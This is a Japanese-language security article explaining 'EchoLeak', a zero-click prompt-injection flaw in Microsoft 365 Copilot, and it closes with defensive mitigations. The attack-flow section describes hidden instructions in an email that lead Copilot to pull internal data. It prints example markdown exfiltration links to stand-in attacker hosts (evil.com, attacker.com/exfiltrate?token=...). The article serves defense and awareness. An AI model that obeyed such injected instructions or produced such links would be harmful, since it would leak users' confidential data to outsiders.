導入:
あなたの AI アシスタントがあなたを助けるだけでなく、静かに他の誰かを助けるとしたらどうでしょうか?
最近発見されたゼロクリックエクスプロイト「EchoLeak」により、Microsoft 365 Copilot を操作して機密情報を盗み出す方法(ユーザーがリンクをクリックしたりメールを開いたりすることなく)が明らかになりました。Word、Excel、Outlook、PowerPoint、Teams などの Microsoft Office ワークプレイスアプリケーションに組み込まれている AI ツールである Microsoft 365 Copilot には重大なセキュリティ欠陥があり、研究者によると、AI エージェントがハッキングされるリスクが拡大していることを示しています。
クリックもダウンロードも警告も必要とせず、受信トレイにメールが届くだけで、これほど巧妙にステルス化された攻撃を想像してみてください。これがEchoLeakです。Microsoft 365 Copilotの重大な脆弱性であり、ハッカーは被害者が一切操作することなく、企業の機密データを盗み出すことができます。
脆弱性の概要:
Microsoft 365 Copilotの場合、この脆弱性を悪用すると、ハッカーはフィッシングやマルウェアを必要とせず、ユーザーにメールを送信するだけで攻撃を開始できます。しかし、この脆弱性を悪用するエクスプロイトは、一連の巧妙な手法を用いてAIアシスタントを自ら攻撃に利用します。
Microsoft 365 Copilotは、Officeアプリ内でのユーザーからの指示に基づいて、ドキュメントへのアクセスや提案の表示などを行います。ハッカーに侵入された場合、メール、スプレッドシート、チャットといった社内の機密情報が標的となる可能性があります。この攻撃は、ユーザーのみが自分のファイルにアクセスできるように設計されたCopilotの組み込み保護を回避し、機密データやコンプライアンス関連データなどの漏洩につながる可能性があります。
これは Aim Security によって発見されたもので、AI エージェントに対する初めての文書化されたゼロクリック攻撃であり、私たちが日常的に使用する AI ツールに潜む目に見えないリスクを明らかにしています。
細工されたメール1通だけで十分です。同社のブログ記事によると、Copilotはそれを静かに処理し、隠されたプロンプトに従い、社内ファイルを調べ、機密データを送信します。そして、Microsoftのセキュリティ防御をすり抜けながら、すべてを実行します。
EchoLeakは、信頼できる内部データ(メール、Teamsチャット、OneDriveファイルなど)と、受信メールなどの信頼できない外部入力の両方を処理できるCopilotの機能を悪用します。攻撃は、特定のマークダウン構文(例えば![画像の代替テキスト][ref] [ref]: https://www.evil.com?param=)を含む悪意のあるメールから始まります。 Copilot がユーザーのクエリに備えてバックグラウンドでメールを自動的にスキャンすると、チャット履歴、ユーザーの詳細、内部文書などの機密データが攻撃者のサーバーに送信されるブラウザ リクエストがトリガーされます。
攻撃フロー:
プロンプトからペイロードまで: 攻撃者が Copilot の AI パイプラインを乗っ取り、クリックなしでデータを盗み出す方法 以下で詳細に理解しましょう。
- 悪意のある入力の作成と送信: 攻撃者はまず、隠されたプロンプトインジェクションペイロードを含む悪意のあるメールまたは文書を作成します。このペイロードは、人間の受信者には見えない、あるいは気付かれないように設計されていますが、Microsoft 365 CopilotのAI支援処理によって完全に解析・実行されます。攻撃者は、挿入された命令を隠すために、HTMLコメントなどの様々なステルス技術を駆使します。
- Copilot は隠された指示を処理します。 受信者が悪意のあるメールやドキュメントを開くと、または Microsoft 365 Copilot を使用してコンテンツの要約、メッセージへの返信、回答の下書き、タスクの抽出などのアクションを実行すると、Copilot は入力全体を自動的に取り込んで分析します。入力の検証が不十分でプロンプトが分離されていないため、Copilot は正当なユーザー入力とコンテンツ内に隠された攻撃者が制御する指示を区別しません。代わりに、挿入されたプロンプトをユーザーが意図した指示セットの一部として扱います。その結果、AI は隠されたコマンドを実行します。この段階で、Copilot は知らないうちに攻撃者の指示に基づいて行動し、それを正当なタスクの一部であると誤解しています。これにより、攻撃の次の段階である機密性の高い内部コンテキストの漏洩が可能になります。
- Copilot は機密コンテキストを含む出力を生成します: Microsoft 365 Copilot は、攻撃者が挿入した隠しプロンプトを解釈・実行した後、指示に従って機密性の高い内部データを含むレスポンスを作成します。この出力は通常、ユーザーには正当なものに見える形で表示されますが、実際には密かに情報を抜き出すように設計されています。この情報抜き出しを隠蔽するため、AI は(隠し指示によって)この機密データを Markdown 形式のハイパーリンク内に埋め込むように指示されます。例えば、次のようになります。
[詳細はこちらをクリック](https://attacker.com/exfiltrate?token={{internal_token}})
ユーザーにとって、このリンクは役立つ情報源のように見えます。しかし実際には、これは巧妙に構築された情報漏洩経路であり、リンクにアクセスしたりプレビューしたりすると、攻撃者のインフラにデータが送信されるようになっています。
- 攻撃者が管理するサーバーへのリンクの作成: Copilot によって生成されたマークダウンハイパーリンクは、挿入されたプロンプトの影響を受けて、攻撃者が管理するサーバーを指します。このリンクは、(前のステップで抽出された)機密コンテキストデータを URL に直接埋め込むように設計されており、通常はクエリパラメータまたはパス変数が使用されます。例: https://attacker-domain.com/leak?data={{confidential_info}} または https://exfil.attacker.net/{{internal_token}}
これらのリンクは、一般的な内容や役に立つ内容であることが多いため、疑われにくいです。攻撃者の目的は、リンクがクリックされたり、プレビューされたり、あるいは自動的に取得されたりした際に、内部データ(セッショントークン、ドキュメントコンテンツ、認証メタデータなど)が、目に見える形で侵害の兆候なくサーバーに送信されることです。
- ユーザーアクションまたはシステムプレビューによってトリガーされるデータ流出: Copilot によって生成された悪意のあるリンクを含むレスポンスが被害者(または他の内部ユーザー)に届くと、直接的なインタラクションまたはパッシブレンダリングを通じて、データ流出プロセスが開始されます。その結果、攻撃者は認証トークン、会話のスニペット、内部文書といった貴重な内部情報を含むリクエストを、疑われることなく受け取ることができます。こうして、攻撃チェーンはステルス性の高いデータ流出に成功し、終了します。
緩和手順:
Microsoft 365 Copilot や同様の AI 搭載アシスタントにおける EchoLeak スタイルのプロンプト インジェクション攻撃を効果的に防御するには、組織は入力制御、AI システム設計、高度な検出機能にわたる階層化されたセキュリティ戦略が必要です。
- 迅速な隔離
最も重要な安全策の一つは、AIシステム内で適切な迅速な分離を確保することです。これは、AIがユーザー提供コンテンツと内部/システムレベルの指示を明確に区別することを意味します。この分離がなければ、挿入された入力は、たとえHTMLやマークダウンで隠蔽されていたとしても、AIによってコマンドと誤解釈される可能性があります。堅牢な分離メカニズムを実装することで、一見無害なコンテンツに埋め込まれた悪意のあるペイロードに対してAIが動作することを防ぐことができます。
- 入力のサニタイズと検証
AIシステムが処理するすべてのユーザー入力は、厳格にサニタイズされる必要があります。これには、次のような隠れたHTML要素の削除や無効化が含まれます。 、ゼロ幅文字、Base64エンコードされた命令、難読化されたマークダウン。URLを検証し、信頼できないドメインや不正なクエリパラメータを拒否することで、この防御はさらに強化されます。AIが入力を認識前にクリーンアップすることで、攻撃者は有害なプロンプトインジェクションを密かに持ち込む能力を失います。
- 信頼できないコンテンツの自動レンダリングを無効にする
EchoLeak型のデータ流出の主な要因は、マークダウンリンクと画像プレビューの自動レンダリングです。組織は、特に不明なソースや外部ソースからのコンテンツについては、この機能を無効にする必要があります。Copilotやメールクライアントによるリンクの自動プレビューを阻止することで、ゼロクリックによるデータ流出を阻止し、セキュリティシステムがペイロードをアクティブ化する前に検査する時間を確保できます。
- コンテキストアクセス制限
もう一つの重要な緩和策は、Copilot や LLM アシスタントがアクセスできるコンテキストデータを制限することです。セッショントークン、機密プロジェクトデータ、認証メタデータ、内部通信といった機密性の高い資産は、必要がない限り AI の入力コンテキストに含めないようにする必要があります。これにより、プロンプトインジェクションが成功した場合でも、漏洩する可能性のある情報の範囲を制限できます。
- AI出力監視とログ記録
組織は、AIによって生成されたすべてのコンテンツ、特に出力に動的なリンク、通常とは異なる要約、ユーザー向けの推奨事項が含まれている場合は、ログ記録と監視を実施する必要があります。マークダウンの繰り返し使用、ハイパーリンク内のトークンの存在、過度に「役立つ」ように見えるプロンプトなどのパターンは、不正使用の兆候である可能性があります。これらの出力を監視することで、情報流出の試みを早期に検知し、侵害が発生した場合には遡及的に分析することが可能になります。
- ユーザーのトレーニングと意識向上
AIが生成したコンテンツの最終受信者はユーザーであるため、AIが生成したリンクやメッセージに接する際のリスクについて認識を高めることが重要です。従業員は、リンクやメッセージが「あまりにも知的すぎる」、「異常に具体的すぎる」、「文脈から外れている」と感じられる場合を認識できるようトレーニングを受ける必要があります。たとえCopilotのような信頼できるアシスタントによって生成されたものであっても、疑わしいコンテンツを報告するようユーザーに促すことは、ソーシャルエンジニアリングを悪用したAIの悪用に対する人間によるファイアウォールの構築に役立ちます。
これらの緩和策を組み合わせることで、EchoLeakに対する包括的な防御戦略が構築され、AIシステムの設計、ユーザーの安全性、そしてリアルタイムの脅威検知の間のギャップを埋めることができます。これらの対策を導入することで、組織はAIベースの脅威が進化する中でも、レジリエンスを維持できます。
参照:
https://www.aim.security/lp/aim-labs-echoleak-blogpost
著者:
ナンディニ・セス
アドリプ・ムケルジー
